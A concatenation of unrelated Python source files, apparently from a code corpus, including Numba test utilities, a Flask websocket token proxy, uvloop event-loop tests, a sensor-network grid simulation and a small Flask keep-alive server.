else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.numpy_version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if utils.PYVERSION >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, io.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.core import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
class CheckWarningsMixin(object):
@contextlib.contextmanager
def check_warnings(self, messages, category=RuntimeWarning):
with warnings.catch_warnings(record=True) as catch:
warnings.simplefilter("always")
yield
found = 0
for w in catch:
for m in messages:
if m in str(w.message):
self.assertEqual(w.category, category)
found += 1
self.assertEqual(found, len(messages))
|
run.py
|
import websocket, multiprocessing, os, warnings
from datetime import datetime, timedelta
from dateutil.parser import parse
from flask import Flask, Response, request
from flask_cors import cross_origin
from osmosis_streaming_driver.proxy_server.token_store import TokenStore
PROXY_SERVER_PORT = 3580 if 'PROXY_SERVER_PORT' not in os.environ else os.environ['PROXY_SERVER_PORT']
PROXY_SERVER_HOST = 'localhost'
if 'PROXY_SERVER_HOSTNAME' in os.environ:
PROXY_SERVER_HOST = os.environ['PROXY_SERVER_HOSTNAME']
else:
import socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
PROXY_SERVER_HOST = s.getsockname()[0]
except Exception as e:
warnings.warn('Error while trying to obtain IP address of this host. %s' % str(e))
app = Flask(__name__)
store = TokenStore()
def _validate_stream_async(stream_url, q):
try:
ws = websocket.create_connection(stream_url)
ws.close()
except Exception as e:
print(e)
q.put((False, "Unable to connect to stream. Details: '%s'" % str(e)))
else:
q.put((True, ""))
def _validate_stream(stream_url, timeout_sec=5):
q = multiprocessing.Queue()
process = multiprocessing.Process(target=_validate_stream_async, args=(stream_url, q))
process.start()
process.join(timeout_sec)
if process.is_alive():
process.terminate()
return False, "Timeout while trying to connect to '%s'" % stream_url
success, err_message = q.get()
return success, err_message
@app.route('/token')
def get_token():
stream_url = request.args.get('stream_url', type=str)
expires_at_str = request.args.get('expires_at', type=str)
if stream_url is None:
return "You need to provide the URL of your stream.", 400
if expires_at_str is None:
return "You need to provide the expiration date.", 400
try:
expires_at = parse(expires_at_str)
except:
return f'Expect ISO format expiring date, got {expires_at_str}', 400
test_status, error_message = _validate_stream(stream_url)
if not test_status:
return error_message, 500
return store.register(stream_url, expires_at)
@app.route('/proxy')
@cross_origin()
def proxy_wss():
token = request.args.get('token', type=str)
if token is None:
return "You need to provide a valid token to start proxying.", 400
stream_url, expiration = store.get_token_attributes(token)
if stream_url is None:
return "Token '%s' is invalid. Please provide a valid token." % str(token), 401
ws = websocket.create_connection(stream_url)
def generate(webs):
while expiration > datetime.now():
yield webs.recv()
webs.close()
return Response(generate(ws), mimetype='text/plain')
@app.route('/info')
def info():
return store.dump(), 200
def start():
app.run('0.0.0.0', port=PROXY_SERVER_PORT)
def get_test_client():
return app.test_client()
if __name__ == '__main__':
start()
|
PyThread.py
|
#! /usr/bin/env python
#-*- coding:utf-8 -*-
import time, threading
# 新线程执行的代码:
def loop():
print 'thread %s is running...' % threading.current_thread().name
n = 0
while n < 5:
n = n + 1
print 'thread %s >>> %s' % (threading.current_thread().name, n)
time.sleep(1)
print 'thread %s ended.' % threading.current_thread().name
print 'thread %s is running...' % threading.current_thread().name
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print 'thread %s ended.' % threading.current_thread().name
|
test_base.py
|
import asyncio
import fcntl
import logging
import threading
import time
import uvloop
import unittest
import weakref
from unittest import mock
from uvloop._testbase import UVTestCase, AIOTestCase
class _TestBase:
def test_close(self):
self.assertFalse(self.loop._closed)
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop._closed)
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = self.loop.call_soon(lambda: None)
wd['h'] = h # Would fail without __weakref__ slot.
def test_call_soon(self):
calls = []
def cb(inc):
calls.append(inc)
self.loop.stop()
self.loop.call_soon(cb, 10)
h = self.loop.call_soon(cb, 100)
self.assertIn('.cb', repr(h))
h.cancel()
self.assertIn('cancelled', repr(h))
self.loop.call_soon(cb, 1)
self.loop.run_forever()
self.assertEqual(calls, [10, 1])
def test_call_soon_base_exc(self):
def cb():
raise KeyboardInterrupt()
self.loop.call_soon(cb)
with self.assertRaises(KeyboardInterrupt):
self.loop.run_forever()
self.assertFalse(self.loop.is_closed())
def test_calls_debug_reporting(self):
def run_test(debug, meth, stack_adj):
context = None
def handler(loop, ctx):
nonlocal context
context = ctx
self.loop.set_debug(debug)
self.loop.set_exception_handler(handler)
def cb():
1 / 0
meth(cb)
self.assertIsNone(context)
self.loop.run_until_complete(asyncio.sleep(0.05, loop=self.loop))
self.assertIs(type(context['exception']), ZeroDivisionError)
self.assertTrue(context['message'].startswith(
'Exception in callback'))
if debug:
tb = context['source_traceback']
self.assertEqual(tb[-1 + stack_adj].name, 'run_test')
else:
self.assertFalse('source_traceback' in context)
del context
for debug in (True, False):
for meth_name, meth, stack_adj in (
('call_soon',
self.loop.call_soon, 0),
('call_later', # `-1` accounts for lambda
lambda *args: self.loop.call_later(0.01, *args), -1)
):
with self.subTest(debug=debug, meth_name=meth_name):
run_test(debug, meth, stack_adj)
def test_now_update(self):
async def run():
st = self.loop.time()
time.sleep(0.05)
return self.loop.time() - st
delta = self.loop.run_until_complete(run())
self.assertTrue(delta > 0.049 and delta < 0.6)
def test_call_later_1(self):
calls = []
def cb(inc=10, stop=False):
calls.append(inc)
self.assertTrue(self.loop.is_running())
if stop:
self.loop.call_soon(self.loop.stop)
self.loop.call_later(0.05, cb)
# canceled right away
h = self.loop.call_later(0.05, cb, 100, True)
self.assertIn('.cb', repr(h))
h.cancel()
self.assertIn('cancelled', repr(h))
self.loop.call_later(0.05, cb, 1, True)
self.loop.call_later(1000, cb, 1000) # shouldn't be called
started = time.monotonic()
self.loop.run_forever()
finished = time.monotonic()
self.assertLess(finished - started, 0.1)
self.assertGreater(finished - started, 0.04)
self.assertEqual(calls, [10, 1])
self.assertFalse(self.loop.is_running())
def test_call_later_2(self):
# Test that loop.call_later triggers an update of
# libuv cached time.
async def main():
await asyncio.sleep(0.001)
time.sleep(0.01)
await asyncio.sleep(0.01)
started = time.monotonic()
self.loop.run_until_complete(main())
delta = time.monotonic() - started
self.assertGreater(delta, 0.019)
def test_call_later_negative(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop.stop()
self.loop.call_later(-1, cb, 'a')
self.loop.run_forever()
self.assertEqual(calls, ['a'])
def test_call_at(self):
i = 0
def cb(inc):
nonlocal i
i += inc
self.loop.stop()
at = self.loop.time() + 0.05
self.loop.call_at(at, cb, 100).cancel()
self.loop.call_at(at, cb, 10)
started = time.monotonic()
self.loop.run_forever()
finished = time.monotonic()
self.assertLess(finished - started, 0.07)
self.assertGreater(finished - started, 0.045)
self.assertEqual(i, 10)
def test_check_thread(self):
def check_thread(loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an "
"event loop other than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = self.new_loop()
try:
asyncio.set_event_loop(loop2)
check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test_run_once_in_executor_plain(self):
called = []
def cb(arg):
called.append(arg)
async def runner():
await self.loop.run_in_executor(None, cb, 'a')
self.loop.run_until_complete(runner())
self.assertEqual(called, ['a'])
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test_run_until_complete_type_error(self):
self.assertRaises(
TypeError, self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_loop()
self.addCleanup(other_loop.close)
self.assertRaises(
ValueError, other_loop.run_until_complete, task)
def test_run_until_complete_error(self):
async def foo():
raise ValueError('aaa')
with self.assertRaisesRegex(ValueError, 'aaa'):
self.loop.run_until_complete(foo())
def test_debug_slow_callbacks(self):
logger = logging.getLogger('asyncio')
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.2
self.loop.call_soon(lambda: time.sleep(0.3))
with mock.patch.object(logger, 'warning') as log:
self.loop.run_until_complete(asyncio.sleep(0, loop=self.loop))
self.assertEqual(log.call_count, 1)
# format message
msg = log.call_args[0][0] % log.call_args[0][1:]
self.assertIn('Executing <Handle', msg)
self.assertIn('test_debug_slow_callbacks', msg)
def test_debug_slow_timer_callbacks(self):
logger = logging.getLogger('asyncio')
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.2
self.loop.call_later(0.01, lambda: time.sleep(0.3))
with mock.patch.object(logger, 'warning') as log:
self.loop.run_until_complete(asyncio.sleep(0.02, loop=self.loop))
self.assertEqual(log.call_count, 1)
# format message
msg = log.call_args[0][0] % log.call_args[0][1:]
# self.assertIn('Executing <Handle', msg)
# self.assertIn('test_debug_slow_callbacks', msg)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1 / 0
logger = logging.getLogger('asyncio')
# Test call_soon (events.Handle)
with mock.patch.object(logger, 'error') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.assert_called_with(
self.mock_pattern('Exception in callback.*zero'),
exc_info=mock.ANY)
# Test call_later (events.TimerHandle)
with mock.patch.object(logger, 'error') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.assert_called_with(
self.mock_pattern('Exception in callback.*zero'),
exc_info=mock.ANY)
def test_set_exc_handler_custom(self):
logger = logging.getLogger('asyncio')
def run_loop():
def zero_error():
self.loop.stop()
1 / 0
self.loop.call_soon(zero_error)
self.loop.run_forever()
errors = []
def handler(loop, exc):
errors.append(exc)
self.loop.set_debug(True)
if hasattr(self.loop, 'get_exception_handler'):
# Available since Python 3.5.2
self.assertIsNone(self.loop.get_exception_handler())
self.loop.set_exception_handler(handler)
if hasattr(self.loop, 'get_exception_handler'):
self.assertIs(self.loop.get_exception_handler(), handler)
run_loop()
self.assertEqual(len(errors), 1)
self.assertRegex(errors[-1]['message'],
'Exception in callback.*zero_error')
self.loop.set_exception_handler(None)
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
self.mock_pattern('Exception in callback.*zero'),
exc_info=mock.ANY)
self.assertEqual(len(errors), 1)
def test_set_exc_handler_broken(self):
logger = logging.getLogger('asyncio')
def run_loop():
def zero_error():
self.loop.stop()
1 / 0
self.loop.call_soon(zero_error)
self.loop.run_forever()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
self.mock_pattern('Unhandled error in exception handler'),
exc_info=mock.ANY)
def test_default_exc_handler_broken(self):
logger = logging.getLogger('asyncio')
_context = None
class Loop(uvloop.Loop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
loop.stop()
1 / 0
loop.call_soon(zero_error)
loop.run_forever()
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
self.mock_pattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError,
'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
class TestBaseUV(_TestBase, UVTestCase):
def test_loop_create_future(self):
fut = self.loop.create_future()
self.assertTrue(isinstance(fut, asyncio.Future))
self.assertIs(fut._loop, self.loop)
fut.cancel()
def test_loop_std_files_cloexec(self):
# See https://github.com/MagicStack/uvloop/issues/40 for details.
for fd in {0, 1, 2}:
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
self.assertFalse(flags & fcntl.FD_CLOEXEC)
class TestBaseAIO(_TestBase, AIOTestCase):
pass
class TestPolicy(unittest.TestCase):
def test_uvloop_policy(self):
try:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
loop = asyncio.new_event_loop()
try:
self.assertIsInstance(loop, uvloop.Loop)
finally:
loop.close()
finally:
asyncio.set_event_loop_policy(None)
|
GridTopology.py
|
import math
import random
import threading
from MacawNode import MacawNode
import wsnsimpy.wsnsimpy_tk as wsp
from Utilization import Utilization
PACKET_SIZE = 256
TX_RANGE = 100
NUM_SENDERS = 10
NODE_SPACING = 60
GRID_BOUNDS = [50, 50, 600, 600]
class GridTopology:
def __init__(self):
self.nodes = []
def set_nodes(self):
for x in range(GRID_BOUNDS[0], GRID_BOUNDS[2], NODE_SPACING):
for y in range(GRID_BOUNDS[1], GRID_BOUNDS[3], NODE_SPACING):
self.nodes.append(simulator.add_node(MacawNode, (x, y)))
for node in self.nodes:
node.tx_range = TX_RANGE
def get_receiver(self, sender):
# Ensure receiver != sender
possible_receiver = self.nodes[random.choice([i for i in range(0, len(self.nodes) - 1) if i != sender.id])]
# Ensure receiver is within range of sender (Pythagoras)
if math.sqrt((sender.pos[0] - possible_receiver.pos[0]) ** 2 + (sender.pos[1] - possible_receiver.pos[1]) ** 2) > TX_RANGE:
return self.get_receiver(sender)
else:
return possible_receiver
def run(self):
for cluster in range(NUM_SENDERS):
sender = self.nodes[random.randint(0, len(self.nodes) - 1)]
receiver = self.get_receiver(sender)
sender.add_data(PACKET_SIZE, receiver, time_offset=random.randint(0, int(NUM_SENDERS / 2)))
if __name__ == '__main__':
simulator = wsp.Simulator(
until=60,
timescale=1,
visual=True,
terrain_size=(650, 650),
title="MACAW Grid Topology Demo"
)
topology = GridTopology()
topology.set_nodes()
topology.run()
threading.Thread(target=Utilization, args=(simulator, topology.nodes,)).start()
simulator.run()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return open("index.html").read()
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
decorators.py
|
import logging, functools
from django.conf import settings
logger = logging.getLogger('biostar')
import threading
try:
# When run with uwsgi the tasks will be spooled via uwsgi.
from uwsgidecorators import spool, timer
except Exception as exc:
#
# With no uwsgi module the tasks will be spooled.
# Creating threaded versions of the decorators from uwsgi.
#
